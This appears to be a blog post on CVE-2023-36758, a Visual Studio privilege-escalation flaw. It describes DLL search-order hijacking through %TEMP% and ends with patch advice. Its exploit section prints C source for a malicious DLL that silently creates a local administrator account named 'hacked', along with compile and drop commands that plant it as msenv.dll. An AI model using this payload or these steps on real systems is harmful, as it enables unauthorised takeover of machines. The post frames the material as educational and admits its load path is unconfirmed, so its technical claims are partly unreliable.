---

Visual Studio is one of the most popular integrated development environments (IDEs) from Microsoft, trusted by millions of developers worldwide. In September 2023, Microsoft addressed a serious issue in Visual Studio, tracked as CVE-2023-36758, which allows attackers to gain higher privileges on affected systems. This post dives deep into this vulnerability, explaining what it is, how it works, how you could potentially exploit it (for education!), and how you can protect your systems.

What is CVE-2023-36758?

CVE-2023-36758 is an Elevation of Privilege (EoP) vulnerability found in certain versions of Microsoft Visual Studio. It was disclosed and patched as part of the September 2023 Patch Tuesday updates.

Official Advisory

You can read the official Microsoft advisory here:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36758

How Does the Vulnerability Work?

At a high level, this vulnerability arises from improper handling of certain system resources by Visual Studio when running as a low-privileged user. By abusing the way Visual Studio launches some of its components, an attacker can trick the IDE into running attacker-controlled code with administrator privileges.

The Core Problem

Visual Studio uses helper processes and certain files in world-writable directories (like %TEMP%), sometimes with overly permissive access control lists (ACLs). If an attacker places a rogue DLL or executable in a location that Visual Studio trusts, they can "hijack" the launch process and execute their payload with elevated permissions.

For example, when Visual Studio launches a tool or extension, it might search for and load DLLs from directories that a normal user can write to. This improper search order can be exploited.

Simple Exploit Scenario

Let’s see how an attacker could exploit this, step by step.

1. Find a World-Writable Folder

Suppose Visual Studio loads a DLL from %TEMP% due to its DLL search order logic. A regular (non-admin) user can write files in %TEMP%.

2. Craft a Malicious DLL

The attacker prepares a DLL file that runs code to, say, add a new admin user or spawn an elevated shell.

malicious.c

#include <Windows.h>
#include <stdlib.h>

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("net user hacked Passwrd! /add");
        system("net localgroup administrators hacked /add");
    }
    return TRUE;
}

Compile this DLL

cl /LD malicious.c

3. Drop the Malicious DLL

The attacker saves their malicious.dll into the world-writable directory (e.g., %TEMP%).

4. Trigger the Hijack

The attacker runs Visual Studio or triggers a feature (extension, custom build step, or debugging session) known to load DLLs from %TEMP%.

If Visual Studio is running as administrator (or jumps to admin for COM server or helper process), it loads and executes the attacker’s code with high privileges.

Real-World Impact

This is a local privilege escalation bug. Attackers need access to a user account, but that's not hard for insiders, malware, or anyone with initial access. Once exploited, they can fully take over the system, install software, steal data, or use the system as a launch pad for other attacks.

Important: There is no remote code execution here; network attackers must first land code on the box.

Here's a simplified PowerShell example to simulate the attack

# The DLL would be compiled as shown above
Copy-Item -Path "C:\Users\attacker\malicious.dll" -Destination "$env:TEMP\msenv.dll"

# Now open Visual Studio, or use 'runas' if you can, to trigger the load.
# When Visual Studio (as admin) loads msenv.dll from %TEMP%, your payload triggers.

Note: The real exploit depends on the specifics of file and DLL loading paths, which may require further research on the version of Visual Studio and installed extensions.

Apply patches

Microsoft updated Visual Studio to fix this bug. Make sure you’re running the latest version. Update now.

References & Further Reading

- Microsoft Security Advisory CVE-2023-36758
- Microsoft Patch Tuesday (September 2023)
- DLL Search Order / Hijacking Explained (FireEye blog)
- Visual Studio Security Updates

Conclusion

CVE-2023-36758 is a classic example of how even trusted, widely-used tools can become a security problem if they mishandle files and processes. If you build, debug, test, or run code on Windows, keep your tools up to date and always think about the Windows security model.

Stay patched and stay safe!

Disclaimer: This post is for educational purposes only. Don’t use this information to break the law or harm others. Always act ethically and legally.

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC